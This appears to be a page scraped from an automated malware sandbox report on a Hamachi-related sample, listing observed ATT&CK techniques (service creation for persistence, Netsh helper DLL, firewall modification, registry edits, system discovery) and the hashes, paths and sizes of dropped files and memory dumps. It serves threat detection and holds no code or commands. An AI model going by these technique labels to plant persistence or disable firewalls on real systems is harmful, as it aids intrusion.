Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Hamachi\nicmgr.exe

Filesize
36KB

MD5
10547f0d258d17ff7874b08641d96d9b

SHA1
33a2b5222011c07e14e7bc67e54457d4bcf287a5

SHA256
1b64e32760a617598eeb95745f8eadda1f6c0f2112deaf9d481e3d2e91aa5693

SHA512
1ad0e77ed6f4159ff7f0cd9351e8d5434dfd8d4ce0a1272e02c988bf9485402c0aad7d46fc08926edc4ddc3a506a52f7a48bdc206e625d5dfd61b8959fcb932f

Download Submit
C:\Users\Admin\AppData\Local\FPEnabler.exe

Filesize
390KB

MD5
4de6146b966bf73fac5619c9ebf5ae65

SHA1
5e35fab0f9985f1b7a999197d4c35f3c0b689b1d

SHA256
737c07b46eae11a561a3a815aa1cd2ca42fb969f9a73139562cfdcfe5d3e9202

SHA512
ad13449703c3af6a46eb9ae7e6c60e16cb8b24207488b4af65c430b290724a73969b61a42ae5bc567eeac3603edce0fdc92c2916d028e68e0d2b2db0465ef87b

Download Submit
C:\Users\Admin\AppData\Local\Hamachi.exe

Filesize
255KB

MD5
5693c3b5569da2561ec61a26b178a258

SHA1
b62d02422964c8fb1080c80b6e07f3741fed02b0

SHA256
395938d4f3551473c2bbf181a0722185d8d6b2c6d25b9d5e7d825930864ff2ae

SHA512
bdb6ea6c904b8880a35fc092acad54cb3952840b68e7a77d77cf71ef22a226d213c621610309dcaccc0a0f82d1cab9dde312ccbc7d59bc7fe0976b810ecd27d2

Download Submit
C:\Users\Admin\AppData\Local\HamachiSetup.exe

Filesize
985KB

MD5
55ea08aa1430781cc969e06ff640d30f

SHA1
d63e91e4a4ec59b0e41c20b30a083378a38eb0fa

SHA256
15cc4630a2d132df00ea741e137b378424a57bfd9d7b17258568364a820bb950

SHA512
e66e70a3dc57e1074431801ca7f82ba79d375cb3a9474ccf7225a7788d0b70fb451fd87d8a63b32211f12725357b0774491feee2a1e03f382e99c3356e9d65ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\bt73068.bat

Filesize
1KB

MD5
5dd6a64582c55c590eecee1002263e1a

SHA1
941fc1ad09f3e4e7b0c64b5afaefea42119f85b0

SHA256
b1b5a69bb6be9c21fc4818e14f69c5d65df26730a4c59d5c48024e7c32b93e03

SHA512
1911a91c0b90aeb81ec4ec8c46f974f3a314b022207fccfbe5b3b35c9b3c9a9abbdcef57a41a3265667d3d7b59c6207c37aa7c53e11f9aaf1af8eca5442446f7

Download Submit
C:\Users\Admin\AppData\Local\instsrv.exe

Filesize
18KB

MD5
c43d1b84143fb2561f22e1a2c8facf53

SHA1
3f1357007f61f02f97f0aaabb8756c6eca2acebd

SHA256
bbf4c224f9861b2c1f5a1364ee71e38728495b2709621763053b979ba88522f1

SHA512
27a25ab6045498e0b7131be58556c685dfa01596675c3af689e61d8329e1a0eff4128c57e202c32c69271b84f57e7425c45fb5fa132ec0f5b352f86323ffa13e

Download Submit
C:\Users\Admin\AppData\Local\srvany.exe

Filesize
15KB

MD5
f03ea3d3a14db51b505b86aba8ed3be2

SHA1
63803ee958baa09e34cd97104e45c3a27dbfe05c

SHA256
ba051c67d3a9ba33efb02fcf354f4be373dcf7daa636de73bdec84456d76dd27

SHA512
24d620729b23efd692744f30f99ea051ee99a8b1afa1899f9bbe904274e13ee26c488ccb3fbd5f4e9a2c901036eac2a2a155fec172d7c58c200f3ed88eabbc18

Download Submit
\??\c:\users\admin\appdata\local\temp\ha002001.tmp\hamachi.cat

Filesize
7KB

MD5
7bdbebde2d5c1210b4eeaf053ed0c54e

SHA1
de36a66c87314e9766ecee5d0d7e1caed993abe7

SHA256
9db08583b12fef4178949aa58ae7ac6df1729491adb92ed9481ef31cbd1a43b2

SHA512
8e295648f5e915ee812017cd5564bde187d845e335a781f2dd7bcb07de610b95bd6b1fd5ce90457260ebfef245fec30f8d0805b66910d927a0475ab5667edfc3

Download Submit
\??\c:\users\admin\appdata\local\temp\ha002001.tmp\hamachi.inf

Filesize
1KB

MD5
b00eff7dc335d40aea15ba37db6b6beb

SHA1
12412f90e5825a36456df41904b9a1037aa5c6f6

SHA256
71e7198be70cf325d309bd4301df8a18a3762814d75b631f797e571ba1697b7b

SHA512
40d325d31fb965f5270c5797c3eafaa0bb2c9be28ce1702161c37ec1d8f6fdcba5d7739b76f4233ef6244536aa3e748bc714b3a3b9cabe239655a9bdf2e9695d

Download Submit
\??\c:\users\admin\appdata\local\temp\ha002001.tmp\hamachi.sys

Filesize
32KB

MD5
f8f0851d336c3b88dbd7232b6348e09a

SHA1
bcb57901adff3b5d2f7418cb57e8a0e6ea979366

SHA256
bd2d98b419325663ff09b07ba8d0ba47896c4b0ce60a9c73702ccbaa3c6ef1cf

SHA512
1e0d4a6a2556b659729d52d4db2bcd6dd25fd4464f630a2e24220abbaf04a6767b71eec95066ad112fe42dbe5f41c0a566b89fd380b8f78f65d612fde916efcf

Download Submit
memory/2960-57-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/2960-66-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/2960-17-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/3412-13-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3412-53-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3412-67-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4008-81-0x0000000000400000-0x0000000000468000-memory.dmp

Filesize
416KB

Download
memory/4448-77-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/4532-54-0x0000000000400000-0x0000000000580000-memory.dmp

Filesize
1.5MB

Download
memory/4532-85-0x0000000000400000-0x0000000000580000-memory.dmp

Filesize
1.5MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads